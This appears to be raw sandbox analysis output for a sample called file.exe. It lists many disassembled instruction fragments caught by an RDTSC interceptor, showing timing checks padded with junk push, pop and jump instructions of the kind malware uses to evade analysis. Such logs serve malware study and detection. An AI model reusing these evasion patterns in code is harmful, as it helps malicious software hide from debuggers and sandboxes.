Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976B81 second address: 976B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976B85 second address: 976B9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A395h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976B9E second address: 976BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983B68 second address: 983B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 jc 00007FE83906A39Bh 0x0000000d jmp 00007FE83906A395h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 982BE5 second address: 982BFD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE83905447Ch 0x00000008 jnc 00007FE839054476h 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FE839054476h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98365B second address: 983661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9838F0 second address: 9838FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE839054476h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9838FB second address: 983901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98993C second address: 989947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 989947 second address: 98994D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98869B second address: 9886B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988806 second address: 98881A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A390h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98881A second address: 988838 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054481h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FE839054476h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988838 second address: 988869 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A396h 0x00000007 jmp 00007FE83906A393h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988869 second address: 98886D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98886D second address: 98888D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A394h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FE83906A386h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9889DB second address: 9889DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9889DF second address: 9889F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A38Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988C4D second address: 988C57 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE839054476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988C57 second address: 988C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988C60 second address: 988C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE839054476h 0x0000000a pop edi 0x0000000b popad 0x0000000c ja 00007FE839054484h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988C76 second address: 988C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9891AE second address: 9891C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE83905447Ch 0x0000000a jc 00007FE839054476h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98931F second address: 98932D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FE83906A386h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98932D second address: 989331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 989331 second address: 989337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 989337 second address: 98933C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9897E7 second address: 9897FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A392h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9897FF second address: 989803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 989803 second address: 989807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 988143 second address: 988149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98B456 second address: 98B45A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E4C2 second address: 98E4EC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE839054476h 0x00000008 jmp 00007FE83905447Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FE839054482h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E4EC second address: 98E513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a jns 00007FE83906A399h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98DDC1 second address: 98DDCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE839054476h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98DDCD second address: 98DE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FE83906A38Dh 0x0000000c jmp 00007FE83906A38Ah 0x00000011 js 00007FE83906A399h 0x00000017 jmp 00007FE83906A393h 0x0000001c popad 0x0000001d pushad 0x0000001e jmp 00007FE83906A398h 0x00000023 jnc 00007FE83906A392h 0x00000029 jnc 00007FE83906A386h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98DF5B second address: 98DF72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE83905447Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E1ED second address: 98E1F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9921EC second address: 992218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054489h 0x00000007 jmp 00007FE83905447Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99721E second address: 99724D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FE83906A3BAh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE83906A393h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9969E1 second address: 9969E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9969E7 second address: 996A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE83906A38Ch 0x0000000a push eax 0x0000000b jc 00007FE83906A386h 0x00000011 jmp 00007FE83906A397h 0x00000016 pop eax 0x00000017 popad 0x00000018 js 00007FE83906A39Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 996A22 second address: 996A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999A9E second address: 999AC2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE83906A392h 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FE83906A386h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999AC2 second address: 999AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999C15 second address: 999C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A03F second address: 99A047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A047 second address: 99A04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A04D second address: 99A094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE839054476h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007FE83905447Bh 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE839054484h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FE839054486h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A094 second address: 99A09A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A09A second address: 99A0A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A0A1 second address: 99A0A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99A0A7 second address: 99A0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99FA9D second address: 99FACC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE83906A392h 0x00000008 js 00007FE83906A386h 0x0000000e jno 00007FE83906A386h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edi 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FE83906A393h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99FC2A second address: 99FC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99FC2E second address: 99FC32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9436A6 second address: 9436AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9436AC second address: 9436C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE83906A399h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0207 second address: 9A0223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE839054488h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0223 second address: 9A0229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0229 second address: 9A0255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE839054482h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE839054480h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A824D second address: 9A8255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A8255 second address: 9A8259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A8259 second address: 9A8261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A8261 second address: 9A8268 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A8AD6 second address: 9A8B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FE83906A396h 0x0000000e jmp 00007FE83906A396h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A8B0D second address: 9A8B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE839054488h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A8E06 second address: 9A8E11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A8E11 second address: 9A8E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE839054489h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007FE83905447Bh 0x00000013 popad 0x00000014 jo 00007FE839054489h 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AAA30 second address: 9AAA34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AAA34 second address: 9AAA48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE839054476h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jno 00007FE839054476h 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9ADB99 second address: 9ADB9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9ADB9D second address: 9ADBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE839054476h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE839054487h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9ADBC2 second address: 9ADBC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9ADD96 second address: 9ADD9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AE18A second address: 9AE19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FE83906A386h 0x0000000a jl 00007FE83906A386h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AE19A second address: 9AE1A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AE542 second address: 9AE554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AE554 second address: 9AE55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3592 second address: 9B35A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FE83906A38Dh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B35A6 second address: 9B35C9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE83905448Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BA41C second address: 9BA437 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FE83906A386h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BA5B7 second address: 9BA5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAB93 second address: 9BAB9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FE83906A386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAB9F second address: 9BABB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054483h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BABB7 second address: 9BABE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FE83906A386h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007FE83906A395h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BABE2 second address: 9BAC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FE839054487h 0x0000000b jmp 00007FE839054480h 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB2A8 second address: 9BB2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BA03F second address: 9BA04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE839054476h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BA04B second address: 9BA05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 js 00007FE83906A386h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C3375 second address: 9C337D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C6471 second address: 9C647D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jl 00007FE83906A386h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D4108 second address: 9D4118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jnp 00007FE839054476h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D4118 second address: 9D4153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A38Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE83906A390h 0x00000011 jmp 00007FE83906A397h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D4153 second address: 9D4163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE83905447Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D3F7E second address: 9D3FB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A397h 0x00000007 ja 00007FE83906A386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007FE83906A393h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6DB5 second address: 9D6DEB instructions: 0x00000000 rdtsc 0x00000002 je 00007FE83905447Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007FE83905449Dh 0x00000014 push edi 0x00000015 jmp 00007FE83905447Ch 0x0000001a pop edi 0x0000001b push esi 0x0000001c jmp 00007FE839054481h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6711 second address: 9D6717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6717 second address: 9D671D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D671D second address: 9D6721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
